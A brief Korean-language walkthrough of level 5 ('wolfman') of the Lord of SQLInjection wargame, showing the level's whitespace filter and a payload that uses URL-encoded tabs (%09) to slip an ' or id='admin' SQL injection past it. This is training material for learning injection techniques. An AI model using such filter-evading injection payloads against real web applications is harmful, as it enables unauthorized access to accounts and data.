Lord of SQLInjection
https://los.rubiya.kr/
Level5 : wolfman
if(preg_match('/ /i', $_GET[pw])) exit("No whitespace ~_~");pw 파라미터의 값에 공백이 막혀있다.
?pw=' or id='admin'%23
공백 대신 tab을 이용해서 공백처럼 사용할 수 있다. tab의 url 인코딩 값은 %09이다.
?pw='%09or%09id='admin'%23
Uploaded by N2T